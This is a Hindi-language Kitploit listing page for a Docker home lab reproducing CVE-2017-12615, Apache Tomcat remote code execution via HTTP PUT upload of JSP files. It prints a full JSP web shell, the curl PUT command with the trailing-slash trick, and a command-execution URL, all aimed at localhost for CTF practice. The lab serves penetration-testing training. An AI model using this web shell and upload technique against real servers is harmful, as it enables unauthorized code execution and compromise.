Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन - रेड टीमिंग और पेनिट्रेशन टेस्टिंग के लिए होम लैब | Kitploit
उपकरण/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन - रेड टीमिंग और पेनिट्रेशन टेस्टिंग के लिए होम लैब

रिपॉजिटरी देखें
710 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन

छवि

यह लैब CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन कमज़ोरी का अनुकरण करता है।
यह readonly=false सेटिंग के कारण उत्पन्न होता है, जिससे HTTP PUT के माध्यम से फ़ाइलें अपलोड की जा सकती हैं, जिसमें .jsp फ़ाइलें भी शामिल हैं जो कमांड निष्पादित कर सकती हैं (RCE)।


छवि

विशेषताएँ

  • Apache Tomcat 7.0.79 (कमज़ोर)
  • DefaultServlet को readonly=false के साथ ओवरराइड किया गया
  • ROOT वेब निर्देशिका में .jsp फ़ाइलें अपलोड करने के लिए PUT अपलोड का उपयोग किया जा सकता है
  • वेब शेल के माध्यम से कमांड निष्पादन का समर्थन
  • औद्योगिक-शैली का वेब पेज जिसमें एक आंतरिक नोट (संकेत) छोड़ा गया है
  • कंटेनर प्रारंभ होने पर स्वचालित रूप से flag_RANDOM.txt बनाता है
  • CTF / रेड टीम / पेंटेस्ट प्रशिक्षण के लिए डिज़ाइन किया गया

निर्देशिका संरचना

/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

उपयोग (कंटेनर चलाना)

docker compose build
docker compose up -d

वेब खोलें:

http://localhost:8080/

CVE-2017-12615 कमज़ोरी का परीक्षण कैसे करें

1) JSP पेलोड फ़ाइल बनाएँ

cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) PUT के साथ फ़ाइल अपलोड करें (फ़ाइल नाम के अंत में / आवश्यक है)

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) वेबशेल का उपयोग करें

http://localhost:8080/shell.jsp?cmd=id

फ़्लैग

इसमें रखा गया है:

/tmp/flag_RANDOM.txt

अंग्रेज़ी संस्करण — CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन

यह लैब CVE-2017-12615 Tomcat: JSP अपलोड के माध्यम से रिमोट कोड निष्पादन का अनुकरण करता है, जहाँ Apache Tomcat का DefaultServlet निम्नलिखित के साथ गलत कॉन्फ़िगर किया गया है:

readonly=false

यह हमलावरों को HTTP PUT के माध्यम से .jsp फ़ाइलें अपलोड करने की अनुमति देता है, जिससे रिमोट कोड निष्पादन संभव होता है।


छवि

विशेषताएँ

  • कमज़ोर Apache Tomcat 7.0.79
  • readonly=false के साथ DefaultServlet ओवरराइड
  • PUT अपलोड → ROOT वेब निर्देशिका में मनमानी .jsp फ़ाइलें लिखना
  • JSP शेल के माध्यम से कमांड निष्पादन का समर्थन
  • एक सूक्ष्म आंतरिक संकेत के साथ औद्योगिक-शैली का लैंडिंग पेज
  • कंटेनर प्रारंभ होने पर स्वचालित रूप से flag_RANDOM.txt जनरेट होता है
  • CTF, अनुसंधान और एक्सप्लॉयट विकास के लिए उपयुक्त

शोषण उदाहरण

JSP शेल अपलोड करें

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

कमांड निष्पादित करें

http://localhost:8080/shell.jsp?cmd=id

फ़्लैग स्थान

/tmp/flag_RANDOM.txt

अस्वीकरण

केवल शैक्षिक, अनुसंधान और अधिकृत पैठ परीक्षण के लिए।

टूल डाउनलोड करें